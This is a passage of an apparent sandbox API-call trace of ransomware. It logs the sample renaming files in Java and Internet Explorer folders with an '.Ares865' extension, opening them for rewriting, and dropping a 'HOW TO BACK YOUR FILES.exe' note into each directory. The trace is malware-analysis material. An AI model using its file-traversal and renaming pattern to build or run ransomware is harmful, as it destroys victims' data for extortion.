(x86)\\java\\jre7\\bin\\wsdetect.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\wsdetect.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\wsdetect.dll.ares865"), dwFlags=0x1) returned 1 [0138.964] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\wsdetect.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\wsdetect.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.965] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=167848) returned 1 [0138.976] lstrcpyW (in: lpString1=0x2cce44a, lpString2="zip.dll" | out: lpString1="zip.dll") returned="zip.dll" [0138.976] lstrlenW (lpString="zip.dll") returned 7 [0138.976] lstrlenW (lpString="Ares865") returned 7 [0138.976] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\zip.dll.Ares865") returned 52 [0138.977] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\zip.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\zip.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\zip.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\zip.dll.ares865"), dwFlags=0x1) returned 1 [0138.978] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\zip.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\zip.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.978] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=66984) returned 1 [0138.984] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2") returned="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2" [0138.985] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2") returned="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2" [0138.985] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0138.985] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\plugin2\\how to back your files.exe"), bFailIfExists=1) returned 0 [0138.986] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0138.986] GetLastError () returned 0x0 [0138.987] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0138.987] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x744249a0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x532380a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x532380a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0138.987] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0138.987] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0138.988] lstrcpyW (in: lpString1=0x2cce45a, lpString2="msvcr100.dll" | out: lpString1="msvcr100.dll") returned="msvcr100.dll" [0138.988] lstrlenW (lpString="msvcr100.dll") returned 12 [0138.988] lstrlenW (lpString="Ares865") returned 7 [0138.988] lstrcmpiW (lpString1="100.dll", lpString2="Ares865") returned -1 [0138.988] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\msvcr100.dll.Ares865") returned 65 [0138.988] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\msvcr100.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\plugin2\\msvcr100.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\msvcr100.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\plugin2\\msvcr100.dll.ares865"), dwFlags=0x1) returned 1 [0138.989] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\msvcr100.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\plugin2\\msvcr100.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.990] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=773968) returned 1 [0139.029] lstrcpyW (in: lpString1=0x2cce45a, lpString2="npjp2.dll" | out: lpString1="npjp2.dll") returned="npjp2.dll" [0139.030] lstrlenW (lpString="npjp2.dll") returned 9 [0139.030] lstrlenW (lpString="Ares865") returned 7 [0139.030] lstrcmpiW (lpString1="jp2.dll", lpString2="Ares865") returned 1 [0139.030] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\npjp2.dll.Ares865") returned 62 [0139.030] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\npjp2.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\plugin2\\npjp2.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\npjp2.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\plugin2\\npjp2.dll.ares865"), dwFlags=0x1) returned 1 [0139.033] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\npjp2.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\plugin2\\npjp2.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0139.033] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=163752) returned 1 [0139.045] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin") returned="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin" [0139.046] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin") returned="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin" [0139.046] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0139.046] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dtplugin\\how to back your files.exe"), bFailIfExists=1) returned 0 [0139.047] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0139.047] GetLastError () returned 0x0 [0139.047] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0139.047] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x743b2580, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5325e200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5325e200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0139.048] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0139.048] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0139.048] lstrcpyW (in: lpString1=0x2cce45c, lpString2="deployJava1.dll" | out: lpString1="deployJava1.dll") returned="deployJava1.dll" [0139.048] lstrlenW (lpString="deployJava1.dll") returned 15 [0139.048] lstrlenW (lpString="Ares865") returned 7 [0139.048] lstrcmpiW (lpString1="va1.dll", lpString2="Ares865") returned 1 [0139.048] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\deployJava1.dll.Ares865") returned 69 [0139.048] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\deployJava1.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dtplugin\\deployjava1.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\deployJava1.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dtplugin\\deployjava1.dll.ares865"), dwFlags=0x1) returned 1 [0139.050] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\deployJava1.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dtplugin\\deployjava1.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0139.050] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=796072) returned 1 [0139.092] lstrcpyW (in: lpString1=0x2cce45c, lpString2="npdeployJava1.dll" | out: lpString1="npdeployJava1.dll") returned="npdeployJava1.dll" [0139.092] lstrlenW (lpString="npdeployJava1.dll") returned 17 [0139.092] lstrlenW (lpString="Ares865") returned 7 [0139.092] lstrcmpiW (lpString1="va1.dll", lpString2="Ares865") returned 1 [0139.093] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\npdeployJava1.dll.Ares865") returned 71 [0139.093] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dtplugin\\npdeployjava1.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\npdeployJava1.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dtplugin\\npdeployjava1.dll.ares865"), dwFlags=0x1) returned 1 [0139.094] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\npdeployJava1.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dtplugin\\npdeployjava1.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0139.095] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=873384) returned 1 [0139.142] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\bin\\client", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\bin\\client") returned="C:\\Program Files (x86)\\Java\\jre7\\bin\\client" [0139.142] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\bin\\client" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\bin\\client") returned="C:\\Program Files (x86)\\Java\\jre7\\bin\\client" [0139.142] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0139.142] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\how to back your files.exe"), bFailIfExists=1) returned 0 [0139.143] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0139.144] GetLastError () returned 0x0 [0139.144] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0139.144] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x743b2580, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5325e200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5325e200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0139.144] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0139.144] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0139.144] lstrcpyW (in: lpString1=0x2cce458, lpString2="classes.jsa" | out: lpString1="classes.jsa") returned="classes.jsa" [0139.145] lstrlenW (lpString="classes.jsa") returned 11 [0139.145] lstrlenW (lpString="Ares865") returned 7 [0139.145] lstrcmpiW (lpString1="ses.jsa", lpString2="Ares865") returned 1 [0139.145] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\classes.jsa.Ares865") returned 63 [0139.145] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\classes.jsa" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\classes.jsa"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\classes.jsa.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\classes.jsa.ares865"), dwFlags=0x1) returned 1 [0139.148] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\classes.jsa.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\classes.jsa.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0139.148] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13762560) returned 1 [0139.342] lstrcpyW (in: lpString1=0x2cce458, lpString2="jvm.dll" | out: lpString1="jvm.dll") returned="jvm.dll" [0139.342] lstrlenW (lpString="jvm.dll") returned 7 [0139.342] lstrlenW (lpString="Ares865") returned 7 [0139.342] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\jvm.dll.Ares865") returned 59 [0139.342] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\jvm.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\jvm.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\jvm.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\jvm.dll.ares865"), dwFlags=0x1) returned 1 [0139.346] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\jvm.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\jvm.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0139.346] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3564968) returned 1 [0139.515] lstrcpyW (in: lpString1=0x2cce458, lpString2="Xusage.txt" | out: lpString1="Xusage.txt") returned="Xusage.txt" [0139.515] lstrlenW (lpString="Xusage.txt") returned 10 [0139.515] lstrlenW (lpString="Ares865") returned 7 [0139.515] lstrcmpiW (lpString1="age.txt", lpString2="Ares865") returned -1 [0139.516] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt.Ares865") returned 62 [0139.516] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\xusage.txt"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\xusage.txt.ares865"), dwFlags=0x1) returned 1 [0139.519] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\xusage.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0139.519] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1447) returned 1 [0139.529] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Internet Explorer") returned="C:\\Program Files (x86)\\Internet Explorer" [0139.532] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Internet Explorer" | out: lpString1="C:\\Program Files (x86)\\Internet Explorer") returned="C:\\Program Files (x86)\\Internet Explorer" [0139.532] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0139.535] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0139.540] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0139.541] GetLastError () returned 0x0 [0139.541] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0139.541] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53284360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53284360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0139.541] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0139.541] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0139.542] lstrcpyW (in: lpString1=0x2cce452, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0139.542] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7928 [0139.542] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5e) returned 0x2f1fc8 [0139.542] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7930 | out: ListHead=0x2e7710, ListEntry=0x2e7930) returned 0x2e7910 [0139.542] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a37297, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2a37297, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2a5d3f7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x23800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExtExport.exe", cAlternateFileName="")) returned 1 [0139.542] lstrcmpiW (lpString1="ExtExport.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0139.542] lstrcmpiW (lpString1="ExtExport.exe", lpString2="aoldtz.exe") returned 1 [0139.542] lstrcpyW (in: lpString1=0x2cce452, lpString2="ExtExport.exe" | out: lpString1="ExtExport.exe") returned="ExtExport.exe" [0139.542] lstrlenW (lpString="ExtExport.exe") returned 13 [0139.542] lstrlenW (lpString="Ares865") returned 7 [0139.542] lstrcmpiW (lpString1="ort.exe", lpString2="Ares865") returned 1 [0139.542] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\ExtExport.exe.Ares865") returned 62 [0139.542] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\ExtExport.exe" (normalized: "c:\\program files (x86)\\internet explorer\\extexport.exe"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\ExtExport.exe.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\extexport.exe.ares865"), dwFlags=0x1) returned 1 [0139.546] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\ExtExport.exe.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\extexport.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0139.546] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=145408) returned 1 [0139.569] lstrcpyW (in: lpString1=0x2cce452, lpString2="hmmapi.dll" | out: lpString1="hmmapi.dll") returned="hmmapi.dll" [0139.569] lstrlenW (lpString="hmmapi.dll") returned 10 [0139.569] lstrlenW (lpString="Ares865") returned 7 [0139.569] lstrcmpiW (lpString1="api.dll", lpString2="Ares865") returned -1 [0139.569] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\hmmapi.dll.Ares865") returned 59 [0139.569] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\hmmapi.dll" (normalized: "c:\\program files (x86)\\internet explorer\\hmmapi.dll"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\hmmapi.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\hmmapi.dll.ares865"), dwFlags=0x1) returned 1 [0139.571] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\hmmapi.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\hmmapi.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0139.572] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=50688) returned 1 [0139.580] lstrcpyW (in: lpString1=0x2cce452, lpString2="ie8props.propdesc" | out: lpString1="ie8props.propdesc") returned="ie8props.propdesc" [0139.580] lstrlenW (lpString="ie8props.propdesc") returned 17 [0139.580] lstrlenW (lpString="Ares865") returned 7 [0139.580] lstrcmpiW (lpString1="ropdesc", lpString2="Ares865") returned 1 [0139.581] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc.Ares865") returned 66 [0139.581] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc" (normalized: "c:\\program files (x86)\\internet explorer\\ie8props.propdesc"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\ie8props.propdesc.ares865"), dwFlags=0x1) returned 1 [0139.584] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\ie8props.propdesc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0139.585] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2649) returned 1 [0139.591] lstrcpyW (in: lpString1=0x2cce452, lpString2="iecompat.dll" | out: lpString1="iecompat.dll") returned="iecompat.dll" [0139.591] lstrlenW (lpString="iecompat.dll") returned 12 [0139.592] lstrlenW (lpString="Ares865") returned 7 [0139.592] lstrcmpiW (lpString1="pat.dll", lpString2="Ares865") returned 1 [0139.592] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\iecompat.dll.Ares865") returned 61 [0139.592] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\iecompat.dll" (normalized: "c:\\program files (x86)\\internet explorer\\iecompat.dll"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\iecompat.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\iecompat.dll.ares865"), dwFlags=0x1) returned 1 [0139.594] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\iecompat.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\iecompat.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0139.594] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7680) returned 1 [0139.599] lstrcpyW (in: lpString1=0x2cce452, lpString2="iedvtool.dll" | out: lpString1="iedvtool.dll") returned="iedvtool.dll" [0139.599] lstrlenW (lpString="iedvtool.dll") returned 12 [0139.599] lstrlenW (lpString="Ares865") returned 7 [0139.599] lstrcmpiW (lpString1="ool.dll", lpString2="Ares865") returned 1 [0139.599] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\iedvtool.dll.Ares865") returned 61 